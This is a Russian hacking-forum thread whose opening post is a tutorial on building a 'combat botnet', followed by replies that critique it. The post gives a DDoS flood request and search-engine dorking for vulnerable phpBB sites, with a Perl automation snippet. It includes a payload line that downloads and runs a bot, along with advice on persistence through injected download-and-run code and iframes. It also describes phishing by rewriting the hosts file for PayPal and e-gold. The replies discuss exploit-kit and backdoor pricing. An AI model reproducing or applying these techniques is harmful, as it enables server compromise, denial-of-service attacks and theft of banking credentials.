Основан 26 Июля 2013 года
freehacks.ru fhacks.me fhacks.pw fhacksnplmzxaaoo.onion

Показано с 1 по 7 из 7
  1. #1
    Trust
    TopicStarter
    Красава
    Аватар для Develop

    Статус
    Offline
    Регистрация
    27.07.2013
    Сообщений
    397
    Репутация
    77 + / -
    Web-программист

    Создаем свой боевой ботнет

    Системы защиты постоянно совершенствуются, программисты стают более опытными. Теперь допускается все меньше и меньше широко известных ошибок.

    [пролог]
    Интернет разростается с огромной силой. Хакеру становится все труднее искать уязвимости. Админы используют для защиты разработки крутейших security експертов. Узнаешь свои мысли? На самом деле в интернете полно уязвимостей, вот толку от них мало. Ну, это еще как посмотреть Вот, представь себе ситуацию, тебя достал какой-то сетевой ублюдок, ты хочешь его наказать. Сегодня мы поговорим о создании собственного боевого ботнета.
    Итак, что же такое "бот". Непосвященному человеку сразу в память бросаются тупые противники в компьютерных играх, которых ты перестреляешь за две минуты. Да, это отчасти так. В нашем случае "бот" - это программа которая исполняет заложеные в нее команды. Вроди ничего особенного. Кто-то возразит: "Я, мол, в пять лет такое написал, нажимаешь на кнопочку и программа,оля-ля,закрывается" Забудем детство. Мы все знаем что возможности кодинга безграничны, и использовать его можно для добра и зла. Мы, конечно, ведь всегда используем наши разработки с благими намериниями. "Ботнет" - это множество ботов собраных в одном центре, которые синхронно исполняют команды владельца. Боты, кстати, в основном нацелены больше на Windows машины. Тут тебе и пароли можно своровать, и сокс поставить, и винт форматнуть Я отойду от правил и расскажу как создать ботнет из nix машин. Основная функция нашего бота- это огранизация DDOS атак. Это идеальный способ использовать широкие каналы nix серверов. Подсчитаем. Сервер который нужно "завалить" стоит на 100Mb канале. Тоесть, 10-20 ботов стоящих на таком же канале завалят сервер во мгновенье. Если от одного сервера можно прикрытся фаерволом, то от большего количества ботов, увы, спасения нет

    [Пишем бота]
    Листинг примерного бота ты найдешь по линку в конце статьи. Разберемся немного с кодом. (эээ, Дрим опять все контролируется через IRC? Через WEB круче!). Кстати, контроль через IRC был выбран через его интерактивность. Допустим, мне захочется порутать локальными ядерными эксплоитами парочку серверов в ботнете. Я просто исполню команду SH uname -a средствами бота и моментально найду нужный мне комп. Потом также исполнив команду в IRC клиенте, загружу бекдор и получу интерактивный шелл для дальнейших действий. Возможности безграничны. Ты скажешь - реализовать такой контроль можно и через WEB, но зачем перезагружать страничку и тратить трафик? Гороздо удобнее наблюдать все в реальном времени (хотя, при ботнете больше 1000 ботов, можно позаботится о удобстве интерфейса -прим. здравого рассудка). Многие думают, что огранизация DDOS дело очень сложное. Вот пример кода обычной атаки:

    Код:
    GET /server.org HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Windows 5.2 i686)\r\nHost: server.org:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n
    Тоесть, мы просто посылаем запрос серверу заставляя на него ответить. Причем посылаем его пока сервер не ляжет от нехватки трафика или процесорного времени. Но разве ты ограничешся одними nix ботами, нужно ведь создавать и виндовий ботнет, например, на основе AgoBot. Для этого можно создать некий код для бота который будет сканировать на предмет lsasl/dcom уязвимостей машины которые коннектятся к серверу на котором установлен бот.

    [Создаем ботнет]
    На самом деле создать ботнет очень легко. Для этого нам понадобится найти уязвимость в любом web скрипте. Найденая уязвимость должна позволять исполнять команды shell интерпритататора. Когда найдешь уязвимость, обрати внимание на название бажного файла, его заголовок, название уязвимой системы. Теперь, с помощью этих данных, нужно составить хороший поисковый запрос. К примеру, возьмен всем известную уязвимость в phpBB<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

    Код:
    $sock = IO::Socket::INET->new(PeerAddr=>"search.aol.com",PeerPort=>"80",P ro to=>"tcp") or next;
    print $sock "GET /aolcom/search?q=viewtopic.php%3Ft%3D7&Stage=0&page=$n HTTP/1.0\n\n";
    @resu = <$sock>;
    close($sock);
    Далее, проводим фильтрацию результатов и запускаем эксплоит. Сам эксплоит должен выполнять команду запуска нашего бота.

    Код:
    wget [Только зарегистрированные могут видеть это. ] bot.c -o bash;chmod +x bash;./bash;
    Здесь можно увидеть сразу две проблемы. wget и gcc может не оказаться или их использование будет запрещено. Здесь нам помогут качалки fech,curl и get или консольный броузер lynx, либо же, использовать ftp протокол. Его реализация сложнее, но и плюс в том, что ftp то есть везде Что касается компилятора, то можно просто скомпилировать бинарник на своем шелле и надеятся что с совместимость все будет ок, или же переписать бота на интерпритированые языки - Perl или PHP. У каждого способа свои достоинства и недостатки, какой использовать, выбор твой. Я привык использовать захваченый сервер по максимуму. Ведь бот на nix сервере продержится лишь до первой перезагрузки машины. Из этой ситуации есть один интересный выход. Бот будет искать интерпритируемые файлы (.pl,.php) доступные на запись и добавлять в них код скачки и запуска бота. Или можно создать еще виндовый ботнет. Реализуется это также легко. Здесь нужна уязвимость в обозревателе интернета(Internet Explorer,Opera,Mozilla) которая приводит к скачке и запуска нужного файла. Далее создается inframe запись загружающая наш вредоносный код. Эта запись добавляется во все index файлы(или во все где есть html код, все зависит от твоей наглости). С такой работой отлично справляется небольшой скриптик Haz, который ты найдешь также в архивчике. Багтрак заполнен записями о критичных уязвимостях в Internet Explorer, так что в нашем подчинении будет и ботнет на Windows системах (его плюсы я упоминал выше). Все, запускай нашего поискового червячка на скоростном шелле, выпей кофе(пиво, водка, томатный сок) заходи на IRC канал указаный в свойствах бота и наблюдай количество своих подчиненных. В заключение хочу передать привет всем кто меня знает и пожелать тебе удачи. Не попадайся.
    ХХХХХХХХХХХХХХХХХХХХХХХХХ ХХХ

    Уязвимость в phpBB актуальна до 2.0.16 версии, хотя разработчики утверждают что они ее исправили в 2.0.11

    Код:
    [Только зарегистрированные могут видеть это. ]
    [Только зарегистрированные могут видеть это. ]
    Фишинг
    Очень удобно использовать ботов в качестве организации фишинга. Для этого нужны специальные заточеные под фишинг страницы эмулирующие нужный нам сайт и хороший хостинг, выделенный сервер или VDS. Такие страницы можно сделать самому, купить, найти в сети. Выбор огромен. Чаще всего фишинг организовывается на сайты: e-gold.com,paypal.com,citybank.com,usbank.com,ebay.c om и другие, так или иначе, связаные с электронной комерцией. Далее Windows бот переписывает файл \system32\drivers\etc\hosts добавляя в него ip адрес вашего сервера и присваивая к нему альяс нужного вам сайта. Формат файла таков:
    Код:
    102.54.94.97 e-gold.com
    102.54.94.97 paypal.com
    Тоесть, наберя в броузере сайты e-gold.com и paypal.com пользователь попадает на наш сервер ничего не подозревая. В свою очередь на сервере фишера в httpd.conf добавляются записи о соответствующих доменах.
    Код:
    <VirtualHost *:*>
    DocumentRoot "/home/e-gold.com/www"
    ServerName "www.e-gold.com"
    ServerAlias "e-gold.com" "www.e-gold.com"
    </VirtualHost>
    Разумется в строке броузера будет всем знакомый адрес e-gold.com и даже продвинутый юзер залогинится на сайт ничего не заподозрив. Для полноты картины, скажу, что если пользователь использует прокси сервер то этот способ работать не будет

    Боты на любой вкус
    Agobot/Phatbot/Forbot/XtremBot
    Это лучшее семейство ботов. Написаны на С++. Имеют множество функций защиты от обнаружения и насчитывают более 500 модификаций благодаря четко выраженой модульной структуре.
    SDBot/RBot/UrBot/UrXBot
    Очень популярные на даный момент боты для проведения DDOS атак. Имеют множество дополнительный функций. Таких как открытие Sock4, кейлоггер, автоматический сканер lsass и dcom уязвимостей. Также имеет функцию перенаправления запросов к сайтам антивирусных компаний на локальный сервер путем редактирования \system32\drivers\etc\hosts и установкой небольшего поддельного web сервера на 80 порт.
    DSNX Bots
    Этот бот может проводить DDOS атаки, сканирование портов и еще некоторые мелочи.
    Q8 Bots
    Отличный бот под nix системы. Отличается своим компактным кодом (27 Кб, состоит из одного файла) и неплохой функциональностью. Умеет динамично обновлятся путем скачивания и запуска нового файла. Хорошо реализует основные реализации DDOS (SYN-flood, UDP-flood). Умеет выполнять системные команды. Также неплохо маскируется в системе.
    kaiten
    Также неплохой бот под Unix/Linux системы. Умеет открывать удаленный шелл на захваченом сервере.
    Perl-based bots
    Это очень маленькие боты написаные на Perl. Используются для DDOS атак на Unix-based системах.

    ---
    Статья имеет большой уклон в сторону хакинга, так что непонятно - спрашивайте.
    ---
    Последний раз редактировалось admin; 25.08.2013 в 17:32.

  2. #2
    Аватар для PhreakerChernie

    Статус
    Offline
    Регистрация
    02.12.2013
    Сообщений
    7
    Репутация
    0 + / -
    Другое
    Не подскажете как работает (Perl-based bots) по поподробней????

  3. #3
    Trust
    TopicStarter
    Красава
    Аватар для Develop

    Статус
    Offline
    Регистрация
    27.07.2013
    Сообщений
    397
    Репутация
    77 + / -
    Web-программист
    Думаю лекс увидит это сообщение- ответит на твой вопрос, я не шибко много о нем знаю

  4. #4
    Аватар для PhreakerChernie

    Статус
    Offline
    Регистрация
    02.12.2013
    Сообщений
    7
    Репутация
    0 + / -
    Другое
    Былобы не плохо... так как щас принелся создовать Backdoor на bash но не очень то получается...

  5. #5
    Аватар для r1gLEEE

    Статус
    Offline
    Регистрация
    04.12.2013
    Сообщений
    3
    Репутация
    0 + / -
    Безопасность
    Есть ли какие-то решения под пользователей с iOS?

  6. #6
    Trust
    TopicStarter
    Красава
    Аватар для Develop

    Статус
    Offline
    Регистрация
    27.07.2013
    Сообщений
    397
    Репутация
    77 + / -
    Web-программист
    Да, вроде спу ай поддерживает иос, я не уверен!

  7. #7
    Lord
    of the two universes
    Аватар для •Lexx•

    Статус
    Offline
    Регистрация
    24.10.2013
    Сообщений
    296
    Репутация
    167 + / -
    Другое
    Что-то скомканая статейка... небось 2008-2009 года.
    Автор повидимому решил в 30-50 строк, объять необъятное....
    Из обзора, да в коды, с попыткой описать функционал, того с чем не имел дел...
    Ирку давно уже не юзают, да и боты сейчас заточены под конкретный функционал....
    ддос боты сейчас пишутся командой, последний кто отжигал в одиночку на рынке это Сокол...
    Воще ботнет сейчаса деляться на три основные категории..., как впрочем и раньше, это лоадеры (имхо лучшее, особенно если есть стелз механизмы), банковские трояны, поколения зеус, ну и ддос... остольное, как в лего, авторы предлогают доп модули, как правило формграбберы.... или то что пожелает заказчик... ну и самое главное, это поддержка, без нее даже толковый бот, через месяц станет мусором... кстати в этом плане парни которые писали Циту, умудрились поднять суппорт на серьезный уровень, чего до них в практике еще небыло....
    Теперь занимательные момет от автора:
    Ведь бот на nix сервере продержится лишь до первой перезагрузки машины. Из этой ситуации есть один интересный выход. Бот будет искать интерпритируемые файлы (.pl,.php) доступные на запись и добавлять в них код скачки и запуска бота.
    почему же сразу не залить, то что конкретно закрепится в системе? а то что живет до первого ребута, это говно бот... +идиотский маздай, и крышка боту и стараниям, о том, чтобы выжеать по максисмому, можно забыть, именно из за того, что сразу не залил норм бота....
    Ну и то, что совсем убило:
    Или можно создать еще виндовый ботнет. Реализуется это также легко. Здесь нужна уязвимость в обозревателе интернета(Internet Explorer,Opera,Mozilla) которая приводит к скачке и запуска нужного файла.
    такие сплоеты стоят от 5кб, +постоянная чистка.... кто нибуть давно слышал о нормальной связке?, я нет... даже то что предлогают на рынке в аренду, либо фуфло и заявленный пробив от 18-16% сводится к 3-5%, либо кидалово... все что предлогают, это свяки со сплоетами 2011-2012 года, может и хорошо чищенные, но пробивают как правило тачек из общественных мест, а_ля инет кафе, где админам на безопасность глубоко плевать...
    Раньше сплоеты брали с милворма, но ресуср давно закрыт, а там где они и поподаються, уже как правило стоят заплатки....
    вот как пример один из ресурсов...
    [Только зарегистрированные могут видеть это. ]
    чтоже касаемо реальной стоимости, то вот вам пример...(под винду нет линка под рукой, а вот сплоет под булку,привожу пример ценника)
    [Только зарегистрированные могут видеть это. ]

    Так что как-то так =\
    ЗЫ
    Есть ли какие-то решения под пользователей с iOS?
    Бэк дор от 1500 либерти....
    Последний раз редактировалось •Lexx•; 06.12.2013 в 08:54.
    Мудрый знает не многое, а нужное (с) Эсхил.
    «
    Это планета 13-го типа. Такие уничтожают сами себя, путем внутреннего военного конфликта, экологической катастрофы, но чаще всего — когда их ученые пытаются определить массу бозона Хиггса
    »
    — 790 про Землю.

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  

Информация на сайте предоставлена исключительно в ознакомительных целях, использование знаний в противозаконных целях преследуется по закону! Администрация не несет ответственности за ваши деяния.